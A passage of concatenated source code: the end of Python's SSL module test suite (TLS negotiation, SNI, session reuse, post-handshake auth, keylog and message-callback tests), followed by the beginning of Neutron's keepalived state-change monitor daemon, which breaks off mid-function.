self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(msg, [
("write", TLSVersion.TLSv1, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("write", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.CLIENT_HELLO),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_HELLO),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.CERTIFICATE),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_DONE),
("write", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("write", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.CLIENT_KEY_EXCHANGE),
("write", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.FINISHED),
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
("write", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("write", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.FINISHED),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.NEWSESSION_TICKET),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.FINISHED),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.FINISHED),
])
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
keepalived_state_change.py
|
# Copyright (c) 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import queue
import sys
import threading
import httplib2
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _
from neutron.agent.l3 import ha
from neutron.agent.linux import daemon
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils as agent_utils
from neutron.common import config
from neutron.common import utils as common_utils
from neutron.conf.agent.l3 import keepalived
from neutron import privileged
LOG = logging.getLogger(__name__)
INITIAL_STATE_READ_TIMEOUT = 10
class KeepalivedUnixDomainConnection(agent_utils.UnixDomainHTTPConnection):
def __init__(self, *args, **kwargs):
# Old style super initialization is required!
agent_utils.UnixDomainHTTPConnection.__init__(
self, *args, **kwargs)
self.socket_path = (
ha.L3AgentKeepalivedStateChangeServer.
get_keepalived_state_change_socket_path(cfg.CONF))
class MonitorDaemon(daemon.Daemon):
def __init__(self, pidfile, router_id, user, group, namespace, conf_dir,
interface, cidr):
self.router_id = router_id
self.namespace = namespace
self.conf_dir = conf_dir
self.interface = interface
self.cidr = cidr
self.monitor = None
self.event_stop = threading.Event()
self.event_started = threading.Event()
self.queue = queue.Queue()
self._initial_state = None
super(MonitorDaemon, self).__init__(pidfile, uuid=router_id,
user=user, group=group)
@property
def initial_state(self):
return self._initial_state
@initial_state.setter
def initial_state(self, state):
if not self._initial_state:
LOG.debug('Initial status of router %s is %s', self.router_id,
state)
self._initial_state = state
def run(self):
self._thread_initial_state = threading.Thread(
target=self.handle_initial_state)
self._thread_ip_monitor = threading.Thread(
target=ip_lib.ip_monitor,
args=(self.namespace, self.queue, self.event_stop,
self.event_started))
self._thread_read_queue = threading.Thread(
target=self.read_queue,
args=(self.queue, self.event_stop, self.event_started))
self._thread_initial_state.start()
self._thread_ip_monitor.start()
self._thread_read_queue.start()
# NOTE(ralonsoh): if the initial status is not read in a defined
# timeout, "backup" state is set.
self._thread_initial_state.join(timeout=INITIAL_STATE_READ_TIMEOUT)
if not self.initial_state:
LOG.warning('Timeout reading the initial status of router %s, '
'state is set to "backup".', self.router_id)
self.write_state_change('backup')
self.notify_agent('backup')
self._thread_read_queue.join()
def read_queue(self, _queue, event_stop, event_started):
event_started.wait()
while not event_stop.is_set():
try:
event = _queue.get(timeout=2)
except queue.Empty:
event = None
if not event:
continue
if event['name'] == self.interface and event['cidr'] == self.cidr:
if event['event'] == 'added':
new_state = 'primary'
else:
new_state = 'backup'
self.write_state_change(new_state)
self.notify_agent(new_state)
def handle_initial_state(self):
try:
state = 'backup'
cidr = common_utils.ip_to_cidr(self.cidr)
# NOTE(ralonsoh): "get_devices_with_ip" without passing an IP
# address performs one single pyroute2 command. Because the number
# of interfaces in the namespace is reduced, this is faster.
for address in ip_lib.get_devices_with_ip(self.namespace):
if (address['name'] == self.interface and
address['cidr'] == cidr):
state = 'primary'
break
if not self.initial_state:
self.write_state_change(state)
self.notify_agent(state)
except Exception:
if not self.initial_state:
LOG.exception('Failed to get initial status of router %s',
self.router_id)
def write_state_change(self, state):
self.initial_state = state
with open(os.path.join(
self.conf_dir, 'state'), 'w') as state_file:
state_file.write(state)
LOG.debug('Wrote router %s state %s', self.router_id, state)
def notify_agent(self, state):
resp, content = httplib2.Http().request(
